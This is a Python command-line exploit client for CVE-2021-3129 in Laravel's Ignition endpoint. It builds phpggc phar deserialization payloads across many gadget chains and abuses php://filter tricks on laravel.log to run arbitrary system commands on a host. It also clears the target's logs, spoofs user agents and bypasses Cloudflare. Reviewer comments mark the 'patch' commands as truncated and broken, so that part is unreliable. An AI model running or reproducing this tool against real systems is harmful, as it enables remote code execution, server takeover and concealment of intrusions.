"""Interactive command-line client for testing a Laravel host for CVE-2021-3129.

The script checks the Ignition ``_ignition/execute-solution`` endpoint of a
host, builds phar payloads with phpggc and offers a small command prompt
(``execute``, ``write``, ``clear_logs``, ``patch`` ...).  User-facing texts are
looked up in ``lang/<code>.json`` through :func:`format`.
"""

import argparse
import base64
import json
import locale
import os
import random
import re
import readline  # noqa: F401 - not referenced directly; importing it enables line editing for input()
import shutil
import stat
import subprocess
import sys
import uuid
import zipfile
from urllib.parse import urlparse

import cloudscraper
import requests
from packaging import version

# ANSI escape sequences used to colour terminal output.
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'

# Translation table (message key -> text); filled in by the __main__ section.
translations = {}

# Chains whose phpggc arguments are "<function> <argument>".
LARAVEL_FUNCTION_CHAINS = {
    "laravel/rce1",
    "laravel/rce2",
    "laravel/rce3",
    "laravel/rce4",
    "laravel/rce7",
    "laravel/rce8",
    "laravel/rce9",
    "laravel/rce10",
    "laravel/rce11",
    "laravel/rce12",
    "laravel/rce13",
    "laravel/rce14",
    "laravel/rce15",
    "laravel/rce16",
    "laravel/rce17",
    "laravel/rce20",
    "laravel/rce21",
    "laravel/rce22",
}

# Chains whose phpggc argument is a snippet of PHP code.
LARAVEL_PHP_CODE_CHAINS = {
    "laravel/rce5",
    "laravel/rce6",
    "laravel/rce18",
}

# Chains whose phpggc argument is the bare command.
LARAVEL_COMMAND_CHAINS = {
    "laravel/rce19",
}

LARAVEL_CHAINS = [
    "laravel/rce1",
    "laravel/rce2",
    "laravel/rce3",
    "laravel/rce4",
    "laravel/rce5",
    "laravel/rce6",
    "laravel/rce7",
    "laravel/rce8",
    "laravel/rce9",
    "laravel/rce10",
    "laravel/rce11",
    "laravel/rce12",
    "laravel/rce13",
    "laravel/rce14",
    "laravel/rce15",
    "laravel/rce16",
    "laravel/rce17",
    "laravel/rce18",
    "laravel/rce19",
    "laravel/rce20",
    "laravel/rce21",
    "laravel/rce22",
]

MONOLOG_CHAINS = [
    "monolog/rce1",
    "monolog/rce2",
    "monolog/rce3",
    "monolog/rce5",
    "monolog/rce6",
    "monolog/rce7",
    "monolog/rce8",
    "monolog/rce9",
]

# Every chain tried (in this order) when no explicit chain is selected.
CHAINS = LARAVEL_CHAINS + MONOLOG_CHAINS

# Pool that random_useragent() picks from when --ua is given.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.38 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (iPad; CPU OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.38 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.7444.172 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 15.7; rv:145.0) Gecko/20100101 Firefox/145.0",
    "Mozilla/5.0 (X11; Linux i686; rv:145.0) Gecko/20100101 Firefox/145.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/145.0 Mobile/15E148 Safari/605.1.15",
    "Mozilla/5.0 (iPad; CPU OS 15_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/145.0 Mobile/15E148 Safari/605.1.15",
    "Mozilla/5.0 (Android 16; Mobile; rv:145.0) Gecko/145.0 Firefox/145.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0",
]

PHPGGC_API_URL = "https://api.github.com/repos/ambionics/phpggc/commits/master"
PHPGGC_DIR = "./phpggc-master"
PHPGGC_BINARY = os.path.join(PHPGGC_DIR, "phpggc")
PHPGGC_VERSION_FILE = ".phpggc_version"


class Main:
    """Run the vulnerability check and the command prompt for a single host.

    Constructing an instance immediately starts the workflow (see ``start``).
    """

    def __init__(self, host, force=False, log_path=None, useragent=False, chain=None, php_executable="php",
                 private_key="", no_cache=False, exec_command=None, cloudflare=False):
        """Store the options, create the HTTP session and call ``start()``.

        Args:
            host: Base URL of the target; callers pass it with a trailing "/".
            force: Continue even when the vulnerability checks fail.
            log_path: Log file path on the target; replaced when one is
                detected from the error page.
            useragent: When truthy a random entry of USER_AGENTS is used.
            chain: phpggc chain name, or None to try every chain in CHAINS.
            php_executable: PHP binary used to run phpggc.
            private_key: Value sent as ``X-BYPASS-TOKEN``; an empty string
                falls back to the cached key for this host.
            no_cache: Disable reading/writing the ``.cache`` directory.
            exec_command: Run this single command instead of prompting.
            cloudflare: Use a cloudscraper session instead of requests.
        """
        self.host = host
        self.force = force
        self.log_path = log_path
        self.useragent = self.random_useragent() if useragent else "joshuavanderpoll/CVE-2021-3129"
        self.chain = chain
        self.php_executable = php_executable
        # no_cache and host must be set before the first get_cache() call.
        self.no_cache = no_cache
        self.private_key = private_key if private_key != "" else self.get_cache("private_key")
        self.root_path = None
        self.operating_system = None
        self.is_patched = False
        self.last_used_chain = None
        self.exec_command = exec_command
        self.cloudflare_bypss = cloudflare

        # Setup session
        if self.cloudflare_bypss:
            info('cloudflare.scraper.usage')
            self.session = cloudscraper.create_scraper(
                browser={'browser': 'chrome', 'platform': 'windows', 'mobile': False}
            )
        else:
            self.session = requests.session()

        # Offer to reuse the chain that worked for this host last time.
        previous_chain = self.get_cache("working_chain")
        if chain is None and previous_chain != "":
            use_chain = _input('chains.previous.use', previous_chain).lower()
            if use_chain in ("y", "yes"):
                self.chain = previous_chain

        self.start()

    def start(self):
        """Check the host and hand over to the command prompt; exit if not vulnerable."""
        loading(format('exploit.start', self.host))

        # Check if vulnerable
        if not self.is_vulnerable():
            error('vulnerability.check.failed')
            sys.exit()

        # Ask user interaction
        if not self.exec_command:
            info('actions.help')
        self.ask_command()

    def ask_command(self):
        """Run the one-shot command if one was given, otherwise prompt until ``exit``.

        Implemented as a loop (the prompt never returns on its own) so that a
        long session does not keep growing the call stack.
        """
        if self.exec_command:
            self.cmd_clear_logs()
            self.cmd_execute_cmd(self.exec_command)
            return

        while True:
            response = _input('command.prompt')
            # First word is the command, the remainder (if any) its payload.
            command, _, payload = response.partition(" ")
            command = command.lower()

            if command in ("?", "help"):
                # Return list of commands
                self.cmd_help()
            elif command == "exit":
                # Stop script
                sys.exit()
            elif command == "clear_logs":
                # Attempt to clear laravel.log of target
                self.cmd_clear_logs()
            elif command == "execute":
                # Attempt to execute system command on target
                self.cmd_execute_cmd(payload)
            elif command == "write":
                # Attempt to write to the log file of target
                self.cmd_execute_write(payload)
            elif command == "patch":
                # Attempt to patch the vulnerability on the target
                self.cmd_execute_patch(payload)
            elif command == "patches":
                # Show the available patch modes
                self.cmd_execute_patch_details()
            elif command == "":
                error('command.input.required')
            else:
                error('command.not_found', command)

    def cmd_help(self):
        """Print the list of prompt commands."""
        info('commands.available')
        print(f"{DARKCYAN} exit {CYAN}- {format('program.exit')}.")
        print(f"{DARKCYAN} help {CYAN}- {format('commands.show')}.")
        print(f"{DARKCYAN} clear_logs {CYAN}- {format('logs.clear.prompt')}.")
        print(f"{DARKCYAN} execute {CYAN}- {format('system.execute.prompt')}.")
        print(f"{DARKCYAN} write {CYAN}- {format('logs.write.prompt')}.")
        print(f"{DARKCYAN} patch {CYAN}- {format('vulnerability.patch.prompt')}.")
        print(f"{DARKCYAN} patches {CYAN}- {format('patch.modes.info')}.")

    def cmd_clear_logs(self):
        """Send the log-clearing request; report success unless ``force`` is set."""
        loading('logs.clear.start')
        self.exploit_clear_logs()
        if not self.force:
            _success('logs.clear.success')

    def cmd_execute_cmd(self, cmd: str, ignore_specials=False, output_success=True) -> bool:
        """Generate payloads for ``cmd`` and try them chain by chain.

        Args:
            cmd: Command text; prompted for while empty.
            ignore_specials: Passed to ``generate_payload`` to skip escaping.
            output_success: Passed to ``exploit_execute`` to print the output.

        Returns:
            True when at least one attempted chain reported success.
        """
        while cmd == "":
            cmd = _input('command.prompt')

        loading('command.execute.start', cmd)
        payloads = self.generate_payload(command=cmd, padding=16, ignore_specials=ignore_specials)

        succeeded = False
        total = len(payloads)
        for attempt, payload in enumerate(payloads, start=1):
            self.last_used_chain = payload['name']
            loading('chain.try', payload['name'], attempt, total)
            if self.exploit_execute(payload['data'], output_success):
                succeeded = True

            # After every chain but the last, ask whether to try the next one.
            if attempt < total:
                next_chain = _input('chain.next.prompt').lower()
                if next_chain not in ("y", "yes"):
                    break
        return succeeded

    def cmd_execute_patch_details(self):
        """Print the modes accepted by the ``patch`` command."""
        print(
            f"{BLUE}[•] Different patch modes for \"patch \" command:\n"
            f"{DARKCYAN} env {CYAN}- {format('patch.mode.env')}\n"
            f"{DARKCYAN} index {CYAN}- {format('patch.mode.index')}\n"
            f"{DARKCYAN} private {CYAN}- {format('patch.mode.private')}"
        )

    def cmd_execute_patch(self, mode: str):
        """Send the patch command for ``mode`` and verify via ``patch.php``.

        Requires a known working chain (``self.chain``).  ``mode`` must be
        ``env``, ``index`` or ``private``; anything else is prompted for.
        """
        if self.chain is None:
            warning('chain.invalid')
            return

        mode = mode.lower()
        while mode not in ("env", "index", "private"):
            mode = _input('patch.mode.prompt').lower()

        loading('patch.start', mode)

        private_key = str(uuid.uuid4())
        # NOTE(review): in the reviewed source the echoed text is surrounded by
        # bare newlines (markup around "Exploit patched" appears to have been
        # stripped) - confirm against the upstream project.
        index_patch = base64.b64encode('if(isset($_SERVER["REQUEST_URI"]) && strtolower($_SERVER["REQUEST_URI"]) == "/_ignition/execute-solution") { http_response_code(403); echo "\n\nExploit patched\n\n"; exit(); }'.encode('utf-8')).decode('utf-8')
        private_patch = base64.b64encode(('if(isset($_SERVER["REQUEST_URI"]) && strtolower($_SERVER["REQUEST_URI"]) == "/_ignition/execute-solution") {if(!isset($_SERVER["HTTP_X_BYPASS_TOKEN"]) || $_SERVER["HTTP_X_BYPASS_TOKEN"] != "'+private_key+'") {http_response_code(403);echo "\n\nExploit patched\n\n";exit();}}').encode('utf-8')).decode('utf-8')

        # Setup needed paths for commands
        patch_path = f"{self.root_path}\\\\public\\\\patch.php" if self.operating_system == "windows" else f"{self.root_path}/public/patch.php"
        env_path = f"{self.root_path}\\\\.env" if self.operating_system == "windows" else f"{self.root_path}/.env"
        index_path = f"{self.root_path}\\\\public\\\\index.php" if self.operating_system == "windows" else f"{self.root_path}/public/index.php"

        # Prevent double patch input
        if self.is_patched and mode in ("index", "private"):
            continue_patch = input(YELLOW + f"[!] {format('patch.already')} [Y/N] : ")
            if continue_patch.lower() not in ("y", "yes"):
                warning('patch.aborted')
                return

        # NOTE(review): the three commands below are identical in the reviewed
        # source and never reference index_patch / private_patch / env_path /
        # index_path; the command text looks truncated. Confirm against the
        # upstream project before relying on this method.
        patch_command = None
        if mode == "env":
            # Intended to set APP_DEBUG from 'true' to 'false' in the .env file
            patch_command = f'echo "" > "{patch_path}"'
        elif mode == "index":
            # Intended to inject code into index.php which blocks '/_ignition/execute-solution'
            patch_command = f'echo "" > "{patch_path}"'
        elif mode == "private":
            # Same as 'index' but with a private header key that still grants access
            self.private_key = private_key
            self.cache_data('private_key', self.private_key)
            _success(f"Your \"X-BYPASS-TOKEN\" key is: \"{self.private_key}\".")
            patch_command = f'echo "" > "{patch_path}"'

        if patch_command is None:
            error('patch.payload.failed')
            return

        # Send patch command
        self.cmd_execute_cmd(patch_command, True, False)

        # Set headers. The dict always exists so Cloudflare mode (which leaves
        # the User-Agent to the scraper session) no longer hits a NameError.
        headers = {}
        if not self.cloudflare_bypss:
            headers["User-Agent"] = self.useragent
        if self.private_key != "":
            headers['X-BYPASS-TOKEN'] = self.private_key

        request = self.session.get(url=f"{self.host}patch.php", verify=False, headers=headers)
        if request.status_code == 200:
            self.is_patched = True
            _success('patch.success')
        else:
            error('patch.failed')

    def cmd_execute_write(self, text: str, path=None):
        """Write ``text`` into the target log file (or ``path`` when given).

        Stops at the first step whose HTTP status is not the expected one.
        """
        while text == "":
            text = _input('logs.write.prompt.text')

        loading('logs.write.start', text)
        payload = self.generate_write_payload(text, 16)

        # Step 1. Clear logs to prevent old payloads executing.
        loading('logs.clear.starting')
        self.exploit_clear_logs()

        # Step 2. Cause an error so the log file gets an entry.
        loading('logs.error.start')
        if self.exploit_cause_error().status_code != 500:
            error('logs.error.failed')
            return
        _success('logs.error.success')

        # Step 3. Cause an error with the payload so it lands in the log file.
        loading('payload.send.start')
        if self.exploit_request(payload, 500).status_code != 500:
            error('payload.send.failed')
            return
        _success('payload.send.success')

        # Step 4. Convert the log file into the decoded payload.
        loading('payload.convert.start')
        path = path if path is not None else self.log_path
        convert = f"php://filter/read=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={path}"
        if self.exploit_request(convert, 200).status_code != 200:
            error('payload.convert.failed')
            return
        _success('payload.convert.success')

    def _cache_file_path(self) -> str:
        """Return the per-host cache file path inside ``.cache``."""
        parsed_host = urlparse(self.host)
        file_name = re.sub('[^A-Za-z0-9]+', '', parsed_host.netloc) + ".json"
        return os.path.join(".cache", file_name)

    def cache_data(self, key: str, value):
        """Store ``value`` under ``key`` in this host's cache file (no-op with no_cache)."""
        if self.no_cache:
            return

        os.makedirs('.cache', exist_ok=True)
        file_path = self._cache_file_path()

        file_contents = {}
        if os.path.exists(file_path):
            try:
                with open(file_path, "r") as f:
                    file_contents = json.loads(f.read())
            except json.JSONDecodeError:
                # A corrupt cache file is replaced rather than crashing the tool.
                file_contents = {}

        file_contents[key] = value
        with open(file_path, "w") as f:
            f.write(json.dumps(file_contents, indent=4))

    def get_cache(self, key: str):
        """Return the cached value for ``key``, or "" when absent or caching is off."""
        if self.no_cache or not os.path.exists('.cache'):
            return ""

        file_path = self._cache_file_path()
        if not os.path.exists(file_path):
            return ""

        try:
            with open(file_path, "r") as f:
                cached = json.loads(f.read())
        except json.JSONDecodeError:
            # Treat an unreadable cache file as empty.
            return ""
        return cached[key] if key in cached else ""

    def exploit_clear_logs(self) -> requests.Response:
        """Send the filter-chain request that empties the log file (errors are silenced)."""
        return self.exploit_request(
            f"php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={self.log_path}",
            200,
            True,
        )

    def exploit_cause_error(self) -> requests.Response:
        """Send an invalid view file ("AA"); a 500 response is expected."""
        return self.exploit_request("AA", 500)

    def exploit_execute(self, payload: str, output_success=True):
        """Run the full payload sequence and return True on success.

        The log file is cleared again afterwards regardless of the outcome.
        """
        success = self._exploit_run_steps(payload, output_success)
        self.exploit_clear_logs()
        return success

    def _exploit_run_steps(self, payload: str, output_success: bool) -> bool:
        """Steps 1-5 of ``exploit_execute``; clears the logs after a failed step."""
        # Step 1. Clear logs to prevent old payloads executing.
        loading('logs.clear.starting')
        self.exploit_clear_logs()

        # Step 2. Cause an error so the log file gets an entry.
        loading('logs.error.start')
        if self.exploit_cause_error().status_code != 500:
            error('logs.error.failed')
            self.exploit_clear_logs()
            return False
        _success('logs.error.success')

        # Step 3. Cause an error with the payload so it lands in the log file.
        loading('payload.send.bulk.start')
        if self.exploit_request(payload, 500).status_code != 500:
            error('payload.send.failed')
            self.exploit_clear_logs()
            return False
        _success('payload.send.success')

        # Step 4. Convert the log file into the decoded payload.
        loading('payload.convert.start')
        convert = f"php://filter/read=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={self.log_path}"
        if self.exploit_request(convert, 200).status_code != 200:
            error('payload.convert.failed')
            self.exploit_clear_logs()
            return False
        _success('payload.convert.success')

        # Step 5. Let the host load the log file as a phar archive.
        exploited = self.exploit_request(f"phar://{self.log_path}", 500)
        if exploited.status_code == 500 and "cannot be empty" in exploited.text:
            if output_success:
                _success('output.display')
                # NOTE(review): the separator literal is empty in the reviewed
                # source, and str.split("") always raises ValueError. The
                # closing "</html>" tag is assumed to be the intended marker -
                # confirm against the upstream project. Without the marker the
                # whole body is shown instead of failing.
                _, marker, tail = exploited.text.partition("</html>")
                result = tail if marker else exploited.text
                print(END + result)
                if not result.strip() == "":
                    print(f"{YELLOW}⭐ If this script helped you, consider starring {UNDERLINE}https://github.com/joshuavanderpoll/CVE-2021-3129{END}{YELLOW} ⭐{END}")

            if self.chain is None:
                # Remember the first chain that worked for this host.
                _success('chain.found')
                self.chain = self.last_used_chain
                self.cache_data('working_chain', self.chain)
            return True

        error_search = r"🧨 (.*?)<\/title>"
        error_result = re.search(error_search, exploited.text)
        if error_result:
            error('payload.execute.failed.message', error_result[1])
        else:
            error('payload.execute.failed')
        self.exploit_clear_logs()
        return False

    def random_useragent(self) -> str:
        """Return a random entry of USER_AGENTS."""
        return random.choice(USER_AGENTS)

    def get_local_phpggc_commit(self) -> str | None:
        """Read the local phpggc commit SHA from PHPGGC_VERSION_FILE (None if absent/unreadable)."""
        if not os.path.exists(PHPGGC_VERSION_FILE):
            return None
        try:
            with open(PHPGGC_VERSION_FILE, "r") as f:
                sha = f.read().strip()
            return sha or None
        except OSError:
            return None

    def get_remote_phpggc_commit(self) -> str | None:
        """Fetch the latest commit SHA of ambionics/phpggc:master via the public GitHub API.

        Returns None on any request failure, non-200 status or invalid JSON.
        """
        try:
            resp = self.session.get(
                PHPGGC_API_URL,
                headers={
                    "Accept": "application/vnd.github.v3+json",
                    "User-Agent": self.useragent,
                },
                verify=False,
                timeout=10,
            )
        except Exception:
            # Best effort: the update check must never stop the tool.
            return None

        if resp.status_code != 200:
            return None

        try:
            data = resp.json()
        except ValueError:
            return None
        return data.get("sha")

    def setup_phpggc(self):
        """Download the phpggc master archive, extract it and mark the binary executable."""
        zip_path = "./master_phpggc.zip"
        loading('phpggc.download.start')

        # Remove old phpggc directory
        if os.path.exists(PHPGGC_DIR):
            shutil.rmtree(PHPGGC_DIR, ignore_errors=True)

        # Download repository zip (master branch)
        request = self.session.get(
            "https://github.com/ambionics/phpggc/archive/refs/heads/master.zip",
            verify=False,
            allow_redirects=True,
            headers={"User-Agent": self.useragent},
        )
        with open(zip_path, "wb") as f:
            f.write(request.content)

        # Unzip; the downloaded archive is removed whether or not this works.
        try:
            with zipfile.ZipFile(zip_path, "r") as zip_ref:
                zip_ref.extractall("./")
        except zipfile.BadZipFile:
            # The response was not a zip archive. generate_payload() reports
            # the missing binary right after ensure_phpggc() returns.
            return
        finally:
            os.unlink(zip_path)
        _success('phpggc.download.success')

        # Setup phpggc execute permissions
        loading('phpggc.permissions.update.start')
        if os.path.exists(PHPGGC_BINARY):
            st = os.stat(PHPGGC_BINARY)
            os.chmod(PHPGGC_BINARY, st.st_mode | stat.S_IEXEC)
            _success('phpggc.permissions.update.success')

    def ensure_phpggc(self):
        """Download phpggc when it is missing or a newer remote commit exists."""
        local_sha = self.get_local_phpggc_commit()
        remote_sha = self.get_remote_phpggc_commit()
        phpggc_exists = os.path.exists(PHPGGC_BINARY)

        # Missing binary -> first download; differing known SHAs -> update.
        needs_update = (not phpggc_exists) or bool(remote_sha and local_sha and remote_sha != local_sha)
        if not needs_update:
            return

        self.setup_phpggc()

        # Only write if we have a valid SHA
        if remote_sha:
            try:
                with open(PHPGGC_VERSION_FILE, "w") as f:
                    f.write(remote_sha)
            except OSError:
                # Not fatal - phpggc itself still works
                pass

    def generate_payload(self, command: str, padding=0, ignore_specials=False) -> list:
        """Build one encoded phar payload per chain for ``command``.

        Args:
            command: Command text handed to phpggc.
            padding: Number of "A" characters put in front of each payload.
            ignore_specials: Skip the escaping of "/" and "'".

        Returns:
            A list of ``{"data": <payload>, "name": <chain>}`` dicts; empty
            when PHP or phpggc is unavailable.
        """
        payloads = []
        loading('payload.generate.start')

        # Prepare command
        # NOTE(review): the nesting of the quote escaping is not recoverable
        # from the reviewed (whitespace-collapsed) source; it is kept under the
        # "/" check here. The original's trailing replace("'", "\'") was a
        # no-op ("\'" == "'") and is omitted.
        if not ignore_specials and '/' in command:
            command = command.replace('/', '\\/')
            command = command.replace('\'', '\\\'')

        # Make sure the PHP executable can be run at all.
        try:
            subprocess.run(
                [self.php_executable, "-v"],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                check=True,
            )
        except FileNotFoundError:
            error('php.missing')
            return []
        except subprocess.CalledProcessError:
            error('php.invalid')
            return []

        # Check PHPGGC
        self.ensure_phpggc()
        if not os.path.exists(PHPGGC_BINARY):
            error('phpggc.missing')
            return []

        # Start from an empty scratch directory.
        if os.path.exists("./.tmp"):
            shutil.rmtree("./.tmp")
        os.mkdir("./.tmp")

        chains = CHAINS if self.chain is None else [self.chain]
        for chain in chains:
            phar_name = chain.replace("/", "-") + ".phar"
            phar_path = f"./.tmp/{phar_name}"
            chain_l = chain.lower()

            cmd = [
                self.php_executable,
                "-dphar.readonly=0",
                PHPGGC_BINARY,
                chain,
            ]
            if chain_l in LARAVEL_PHP_CODE_CHAINS:
                # PHP code chains take a code snippet
                cmd.append(f"system('{command}');")
            elif chain_l in LARAVEL_COMMAND_CHAINS:
                # Command chains take the bare command
                cmd.append(command)
            else:
                # Function-call chains and every other chain
                cmd.extend(["system", command])
            cmd.extend(["--phar", "phar", "-o", phar_path])

            # Run phpggc; a chain that produces no file is simply skipped.
            subprocess.run(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            if not os.path.exists(phar_path):
                continue

            with open(phar_path, "rb") as f:
                raw = f.read()
            encoded = base64.b64encode(raw).decode().rstrip("=")
            encoded = "".join(c + "=00" for c in encoded)
            encoded = "A" * padding + encoded
            encoded = encoded.replace("\n", "") + "A"
            payloads.append({"data": encoded, "name": chain})

            # Delete temporary files
            os.unlink(phar_path)

        _success('payload.generate.success.count', len(payloads))
        return payloads

    def generate_write_payload(self, text: str, padding=0) -> str:
        """Encode ``text`` the same way as a phar payload (base64, "=00" after each char)."""
        loading('payload.generate.start')
        payload = base64.b64encode(text.encode()).decode().rstrip('=')
        payload = ''.join(c + '=00' for c in payload)
        payload = 'A' * padding + payload
        _success('payload.generate.success')
        return payload

    def exploit_request(self, value: str, expected_response: int = 200, silent=False) -> requests.Response:
        """POST ``value`` as the ``viewFile`` parameter to the execute-solution endpoint.

        Args:
            value: Value for ``parameters.viewFile``.
            expected_response: Status code considered normal.
            silent: Suppress the error output on an unexpected status.

        Returns:
            The response object, whatever its status.
        """
        data = {
            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
            "parameters": {
                "variableName": "variable",
                "viewFile": value
            }
        }
        headers = {
            "Content-Type": "application/json",
            "Accept": "*/*",
            "User-Agent": self.useragent
        }
        if self.private_key != "":
            headers['X-BYPASS-TOKEN'] = self.private_key

        request = self.session.post(url=f"{self.host}_ignition/execute-solution", json=data, headers=headers, verify=False)

        if request.status_code != expected_response and not silent:
            error_search = r"<title>🧨 (.*?)<\/title>"
            error_result = re.search(error_search, request.text)
            if error_result:
                error('exploit.request.status.invalid.specific', request.status_code, expected_response, error_result[1])
            else:
                error('exploit.request.status.invalid', request.status_code, expected_response)

            # Check if host has patched vulnerability
            # NOTE(review): whether these two checks belong inside the
            # non-silent branch is not recoverable from the reviewed source.
            body = request.text.lower()
            if "runnable solutions are disabled in non-local environments" in body:
                error('exploit.patched.local.env')
            if "solutions can only be executed by requests from a local ip address" in body:
                error('exploit.patched.local.ip')

        return request

    def is_vulnerable(self):
        """Probe the endpoint with GET and decide whether the host looks vulnerable.

        Returns False when a check fails and ``force`` is off; exits the
        process when no log path is found, when the private key is rejected
        three times, or when the reported Laravel version is >= 8.4.2.
        """
        loading(format('url.test', self.host))

        # Set headers
        headers = {
            "User-Agent": self.useragent
        }
        if self.private_key != "":
            headers['X-BYPASS-TOKEN'] = self.private_key

        endpoint = f"{self.host}_ignition/execute-solution"
        request = self.session.get(url=endpoint, verify=False, headers=headers)

        # Host carries the private patch: ask for the key (at most 3 retries).
        attempts = 0
        while request.status_code == 403 and "Exploit patched" in request.text:
            self.is_patched = True
            if attempts > 0:
                error('privatekey.invalid', attempts)
            if attempts >= 3:
                sys.exit(1)

            self.private_key = _input('privatekey.required')
            headers['X-BYPASS-TOKEN'] = self.private_key
            request = self.session.get(url=endpoint, verify=False, headers=headers)
            attempts += 1

        # Check vulnerable url by sending invalid GET request (only POST allowed)
        if request.status_code != 405:
            info('host.status.invalid', request.status_code)
            if not self.force:
                return False

        # Check if vulnerable url contains signs of Laravel
        if "laravel" not in str(request.content):
            if "405 method not allowed" in str(request.content).lower():
                error('host.request.refused')
            else:
                error('host.not_laravel')
            if not self.force:
                return False

        if not self.force:
            _success('host.vulnerable')

        # Check if log path defined in error response
        loading('logs.path.search')
        self.find_log_path(content=request.content)
        if self.log_path is None:
            error('logs.path.notfound')
            sys.exit()
        _success('logs.path.found', self.log_path)

        # Check if laravel version defined in error response
        laravel_version = self.find_laravel_version(content=request.text)
        if laravel_version is not None:
            info('laravel.version.found', laravel_version)
            if not self.force:
                try:
                    current_version = version.parse(laravel_version)
                except version.InvalidVersion:
                    # Unparsable version string: skip the comparison.
                    current_version = None
                if current_version is not None and current_version >= version.parse("8.4.2"):
                    error('laravel.patched.version')
                    sys.exit()

        return True

    def find_log_path(self, content):
        """Derive root path, log path and OS from the file path in the error page.

        ``content`` is converted with ``str()``; for bytes this yields the
        repr, which is why the Windows separators are matched doubled.
        """
        search_pattern = r"The .* supported .* in file (.*?) on line"
        search_res = re.search(search_pattern, str(content))
        if not search_res:
            return

        file_path = search_res[1]
        if "/vendor/laravel/framework" in file_path:
            # Linux system
            info('laravel.os.linux')
            self.root_path = file_path.split("/vendor/laravel/framework")[0]
            self.log_path = f"{self.root_path}/storage/logs/laravel.log"
            self.operating_system = "linux"

        if "\\\\vendor\\\\laravel\\\\framework" in file_path:
            # Windows system
            info('laravel.os.windows')
            self.root_path = file_path.split("\\\\vendor\\\\laravel\\\\framework")[0].replace("\\\\", "\\")
            self.log_path = f"{self.root_path}\\storage\\logs\\laravel.log"
            self.operating_system = "windows"

    def find_laravel_version(self, content: str):
        """Return the ``framework_version`` value found in ``content``, or None."""
        search_pattern = r"\"framework_version\":\"(.*?)\""
        search_res = re.search(search_pattern, content)
        return search_res[1] if search_res else None


def info(text: str, *args):
    """Print an informational message (blue)."""
    print(f"{BLUE}[•] {format(text, *args)}{END}")


def loading(text: str, *args):
    """Print a progress message (dark cyan)."""
    print(f"{DARKCYAN}[@] {format(text, *args)}{END}")


def error(text: str, *args):
    """Print an error message (red)."""
    print(f"{RED}[!] {format(text, *args)}{END}")


def _success(text: str, *args):
    """Print a success message (green)."""
    print(f"{GREEN}[√] {format(text, *args)}{END}")


def warning(text: str, *args):
    """Print a warning message (yellow)."""
    print(f"{YELLOW}[!] {format(text, *args)}{END}")


def _input(text: str, *args):
    """Prompt the user with a translated question and return the typed answer."""
    return input(f"{PURPLE}[?] {format(text, *args)} {END}")


def format(text: str, *args):
    """Translate ``text`` (a message key) and interpolate ``args``.

    Known keys are looked up in ``translations``; ``{COLOR}`` placeholders
    are replaced with ANSI codes before ``str.format`` is applied.  Unknown
    keys are treated as the message itself.
    """
    color_codes = {
        'PURPLE': PURPLE,
        'CYAN': CYAN,
        'DARKCYAN': DARKCYAN,
        'BLUE': BLUE,
        'GREEN': GREEN,
        'YELLOW': YELLOW,
        'RED': RED,
        'BOLD': BOLD,
        'UNDERLINE': UNDERLINE,
        'END': END
    }

    if text not in translations:
        return text.format(*args) if args else text

    formatted_text = translations[text]
    # Replace color placeholders with actual escape codes
    for color, code in color_codes.items():
        formatted_text = formatted_text.replace(f"{{{color}}}", code)
    # Format with any provided args
    return formatted_text.format(*args)


def validate_url(url: str) -> bool:
    """Return True when ``url`` is an http(s) URL with a domain, localhost or IPv4 host."""
    # https://stackoverflow.com/a/7160778
    regex = re.compile(
        r'^(?:http)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    return re.match(regex, url) is not None


if __name__ == "__main__":
    # Load translations strings
    available_languages = [f.split(".")[0] for f in os.listdir("lang") if f.endswith(".json")]

    # Default language: taken from the system locale, falling back to English.
    try:
        locale.setlocale(locale.LC_ALL, '')
    except locale.Error:
        pass
    lang, enc = locale.getlocale()
    language_code = lang.split('_')[0] if lang else 'en'
    if language_code not in available_languages:
        language_code = "en"

    with open(f"lang/{language_code}.json", 'r') as f:
        translations = json.load(f)

    # Credits
    print(f"{PURPLE}{BOLD} _____ _____ ___ __ ___ _ _____ ___ ___ ")
    print(f"{PURPLE}{BOLD} / __\\ \\ / / __|_|_ ) \\_ ) |__|__ / |_ ) _ \\")
